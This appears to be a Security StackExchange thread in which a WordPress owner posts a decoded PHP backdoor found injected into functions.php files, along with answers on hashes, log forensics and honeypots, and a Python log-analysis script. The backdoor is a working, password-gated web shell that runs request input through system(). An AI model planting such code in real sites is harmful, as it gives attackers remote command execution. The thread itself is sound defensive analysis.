
Context: I had a virus on my WordPress website server that injected itself into every functions.php file on the server across two different sites. After removing the heavily obfuscated virus code I decoded it. (I won't bore you with process details.) The resulting code was a simple backdoor that let the hackers execute code at the system level only from one specific URL that they control.

<?php
// Backdoor as decoded from the injected functions.php files.
$c = "2caf6917ca3d9a3a85d26029ed623b1a";   // md5 of the attacker's password
$p = md5(urldecode($_REQUEST["p"]));       // hash whatever was sent in p (GET or POST)
if ($p != $c) exit;                        // wrong password: do nothing
$s = urldecode($_REQUEST["s"]);            // the command to run
if ($s == "") exit;
system($s);                                // runs it as the web server user
exit;
?>

Is it possible to decode the md5 hash, and therefore learn which malicious website was using the back doors to my server?

Jezza
    The title and the body of your question don't match. In the title you ask about decoding the md5, in the body you ask about finding who used this backdoor. Please align title and body to show what you really want to know. – Steffen Ullrich Dec 31 '19 at 08:27
  • I'd love to decode the md5 hash in hopes that it reveals the URL which attacked my site, but I suspect the hash is only one parameter of the URL. Another parameter of the URL is the code they want to execute, and the whole URL is probably invisible even if we could decode the md5 hash. – Jezza Dec 31 '19 at 08:42
  • Could it be related to the following? https://stackoverflow.com/questions/32134960/my-website-got-hacked-what-does-this-code-do Same digest value in the answer. – Todd Johnson Dec 31 '19 at 07:34
  • Yes, definitely related, and perhaps the same virus or at least the same people running viruses from a particular URL with that encoded URL value. I don't think it's going to be possible to decode that key back to a whole URL, because the p value is just a parameter of the URL, not the whole thing. – Jezza Dec 31 '19 at 08:24
  • Hashes by their nature cannot be reversed; they are a computation on the input. It's like saying "I have the number 100, what numbers did the original person add together to get that value?" – Joe Dec 31 '19 at 16:03

1 Answer


Is it possible to decode the md5 hash, and therefore learn which malicious website was using the back doors to my server?

As for the (in)feasibility of decoding the md5 hash, see for example here. In short: if it is simple you can brute force it, if it is complex it will be infeasible.

But even if you were able to decode the hash: it does not contain the information you want, i.e. who is using the backdoor. This hash is instead just the hash of a password, and if the password (parameter p) does not fit the predefined hash then the code will not be executed:

$c = "2caf6917ca3d9a3a85d26029ed623b1a";
$p = md5(urldecode($_REQUEST["p"]));
if ($p != $c) exit;

The command to execute instead is inside the parameter s:

$s = urldecode($_REQUEST["s"]);
if ($s == "") exit;
system($s);

But even this does not tell you who is using the backdoor but only what the attacker is doing. To get more information about the attacker you actually would need to look into the access log of your server. With luck you might find requests to your site with a path like this:

 /compromised.php?p=<password>&s=<command>

From this log you get the password and the command, and you also usually get the IP address of the client which accessed the URL - i.e. the public IP address of the attacker. Note that this does not need to be the real IP address of the attacker, since the attacker could use other systems (like a botnet) as jump hosts or could even embed this malicious action as a URL in some site where it gets called by an innocent visitor - although in this case the attacker is unlikely to get the output of the command.

Note that the request parameters might also be sent as parameters inside a POST request, in which case you only see the access to the compromised PHP script but not the parameters in the log. Yet, you still have the source IP address and you know when the backdoor was called. And you might disarm the backdoor (i.e. disable the call to system) and instead log the parameters in the hope that the attacker will still try to use the backdoor.

Steffen Ullrich
  • It's most likely that `s` and `p` are sent as POST data (`$_REQUEST` merges both GET & POST data in PHP), so it won't appear in logs... But it costs nothing to check, bad attackers also exist :) – Benoit Esnard Dec 31 '19 at 09:24
  • The other option if you really want to investigate this is to set up a honeypot. That is, put code onto your page that listens for the password and command and logs them. With any luck the attacker doesn't yet know it's been cleaned up, and tries to use the backdoor. (just remember not to actually run the command!) – Josiah Dec 31 '19 at 18:17
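The log review the answer describes, as an added example (this is not code from the question, the answer or WordPress). It assumes the Apache/nginx "combined" access log format, and since the backdoor was injected into functions.php, which WordPress includes on every page load, it keys on the p and s query parameters rather than on a fixed script path like the answer's placeholder /compromised.php. The log lines, IP addresses, password and command are constructed for the demo; the digest is the one from the decoded backdoor. A confirmed hit replays the backdoor's own gate (md5 of the decoded p against the constant) so you can tell a real use from a probe with a wrong password, and POSTs whose parameters are not visible are listed separately and correlated by source IP.

```python
import hashlib
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constant from the decoded backdoor: md5 of the attacker's password.
BACKDOOR_HASH = "2caf6917ca3d9a3a85d26029ed623b1a"

# Apache/nginx "combined" access log layout (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+'
)

# Constructed sample log: RFC 5737 documentation IPs, invented password and command.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Dec/2019:22:14:03 +0000] "GET /?p=secret%21&s=id HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [30/Dec/2019:22:15:12 +0000] "GET /index.php HTTP/1.1" 200 20311 "-" "Mozilla/5.0"
203.0.113.7 - - [30/Dec/2019:22:16:41 +0000] "POST / HTTP/1.1" 200 84 "-" "curl/7.64.0"
198.51.100.23 - - [30/Dec/2019:22:17:05 +0000] "POST /?x=1 HTTP/1.1" 200 84 "-" "curl/7.64.0"
"""


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def password_matches(decoded_p, digest=BACKDOOR_HASH):
    """The backdoor's gate: md5(urldecode($_REQUEST["p"])) == $c, on the already decoded value."""
    return md5_hex(decoded_p) == digest


def parse_line(line):
    """Split one access log line into fields; returns None for lines in another format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    # parse_qs percent-decodes once (like PHP filling $_REQUEST) and drops empty
    # values (matching the backdoor's `if ($s == "") exit`); the backdoor then
    # calls urldecode() a second time, which unquote() mirrors here.
    query = parse_qs(urlsplit(entry["target"]).query)
    entry["p"] = unquote(query["p"][0]) if "p" in query else None
    entry["s"] = unquote(query["s"][0]) if "s" in query else None
    return entry


def analyze(log_text):
    """Return confirmed backdoor calls, POSTs with invisible parameters, and the
    subset of those POSTs coming from an IP that already used the backdoor."""
    confirmed, blind_posts = [], []
    for line in log_text.splitlines():
        e = parse_line(line)
        if e is None:
            continue
        if e["p"] is not None and e["s"] is not None:
            confirmed.append({
                "ip": e["ip"], "time": e["time"], "password": e["p"],
                "command": e["s"], "password_match": password_matches(e["p"]),
            })
        elif e["method"] == "POST":
            blind_posts.append({"ip": e["ip"], "time": e["time"], "target": e["target"]})
    suspect_ips = {c["ip"] for c in confirmed}
    related = [b for b in blind_posts if b["ip"] in suspect_ips]
    return {"confirmed": confirmed, "blind_posts": blind_posts, "related": related}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for c in report["confirmed"]:
        print(f"{c['time']} {c['ip']} ran {c['command']!r} "
              f"(password {c['password']!r} matches hash: {c['password_match']})")
    for b in report["related"]:
        print(f"{b['time']} {b['ip']} POST {b['target']} from a known backdoor user, parameters not logged")
```

On a real server, pipe the access log through analyze() and treat every timestamp in "related" as a candidate backdoor call to check against the other evidence (command output files, modified files, outbound connections around that time). A password_match of False on a confirmed entry means someone probed the backdoor with a wrong password, which still gives you a source IP and a time.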